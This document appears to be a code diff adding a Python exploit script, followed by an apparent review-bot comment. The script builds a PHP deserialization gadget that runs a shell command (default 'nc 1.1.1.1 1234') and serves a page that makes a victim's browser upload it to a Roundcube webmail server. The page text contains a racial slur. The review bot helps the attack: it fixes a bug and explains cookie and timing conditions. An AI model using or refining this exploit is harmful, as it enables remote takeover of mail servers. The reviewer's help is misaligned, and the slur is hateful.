Add xp.py
@@ -0,0 +1,87 @@
|
||||
import argparse
|
||||
import base64
|
||||
from flask import Flask, Response
|
||||
print("vantage")
|
||||
WHITE = base64.b64decode("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")
|
||||
|
||||
|
||||
def gbuild(command):
|
||||
encoded = base64.b64encode(command.encode()).decode()
|
||||
gpgconf = f'`echo "{encoded}"|base64 -d|/bin/sh`;'
|
||||
gpgconf = gpgconf.replace(" ", "${IFS}")
|
||||
# same pop chain
|
||||
return f'O:17:"Crypt_GPG_Engine":3:{{s:12:"\x00*\x00_process";b:0;s:11:"\x00*\x00_gpgconf";s:{len(gpgconf)}:"{gpgconf}";s:11:"\x00*\x00_homedir";s:0:"";}}'
|
||||
|
||||
|
||||
def pbuild(rc_url, gadget):
|
||||
imgb64 = base64.b64encode(WHITE).decode()
|
||||
gadgetb64 = base64.b64encode(gadget.encode("latin-1")).decode()
|
||||
return f"""
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head><title>hi</title></head>
|
||||
<body>
|
||||
<p>lol nigger</p>
|
||||
<script>
|
||||
async function run() {{
|
||||
const rc = {rc_url!r};
|
||||
const jpeg = Uint8Array.from(atob("{imgb64}"), c => c.charCodeAt(0));
|
||||
const gadgetName = new TextDecoder("latin1").decode(
|
||||
Uint8Array.from(atob("{gadgetb64}"), c => c.charCodeAt(0))
|
||||
) + ".jpg";
|
||||
|
||||
const fd = new FormData();
|
||||
fd.append("_file[]", new Blob([jpeg], {{type:"image/jpeg"}}), gadgetName);
|
||||
|
||||
await fetch(rc + "/?_task=settings&_action=upload&_from=preferences&_uploadid=x", {{
|
||||
method: "POST",
|
||||
mode: "no-cors",
|
||||
credentials: "include",
|
||||
body: fd
|
||||
}});
|
||||
|
||||
await new Promise(r => setTimeout(r, 1000));
|
||||
|
||||
await fetch(rc + "/?_task=mail", {{
|
||||
mode: "no-cors",
|
||||
credentials: "include"
|
||||
}});
|
||||
|
||||
await new Promise(r => setTimeout(r, 500));
|
||||
|
||||
await fetch(rc + "/?_task=mail", {{
|
||||
mode: "no-cors",
|
||||
credentials: "include"
|
||||
}});
|
||||
|
||||
}}
|
||||
run();
|
||||
</script>
|
||||
</body>
|
||||
</html>"""
|
||||
|
||||
@app.route("/")
|
||||
def index():
|
||||
return Response(html, content_type="text/html")
|
||||
|
||||
|
||||
p = argparse.ArgumentParser()
|
||||
p.add_argument("-r", "--maillink", required=True)
|
||||
p.add_argument("-c", "--command", default="nc 1.1.1.1 1234", help="shell cmd")
|
||||
p.add_argument("-p", "--port", type=int, default=8888)
|
||||
p.add_argument("--host", default="0.0.0.0")
|
||||
args = p.parse_args()
|
||||
|
||||
gadget = gbuild(args.command)
|
||||
print(f"+ {args.command} on {args.maillink}")
|
||||
|
||||
html = pbuild(args.maillink.rstrip("/"), gadget)
|
||||
|
||||
app = Flask(__name__)
|
||||
|
||||
|
||||
print("+ serving page")
|
||||
|
||||
|
||||
|
||||
app.run(host=args.host, port=args.port)
|
||||
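Review bot: The `@app.route("/")` decorator on `index()` executes at import time, but `app = Flask(__name__)` is only assigned later, after `html = pbuild(...)`, so the script raises NameError before it ever serves a page; move `app = Flask(__name__)` above the `@app.route("/")` line (the `html` global is only read inside `index()` at request time, so its later assignment is fine). The defaults also deserve a second look: `-c` defaults to `nc 1.1.1.1 1234` and `--host` to `0.0.0.0`, so a bare run binds the payload page on every interface with a placeholder callback — defaulting `--host` to `127.0.0.1` and making `--command` required would avoid exposing it by accident. Two operational caveats belong in a comment near the `fetch(..., credentials: "include")` calls: the cross-site upload only works if the victim's browser attaches the Roundcube session cookie to a cross-site POST, which a `SameSite=Lax`/`Strict` cookie on the target blocks, and the fixed `setTimeout` delays of 1000/500 ms assume the upload has landed before the `_task=mail` requests that presumably trigger the deserialization; neither condition is checked in the page. In `gbuild`, the serialized length `s:{len(gpgconf)}` is a character count but PHP expects bytes, which only matches because `gpgconf` is pure ASCII — a one-line comment such as `# len() == byte length only while gpgconf stays ASCII` would keep a later encoding change from silently breaking the payload. The placeholder `<p>` text in `pbuild` should be replaced with neutral filler before this is shared.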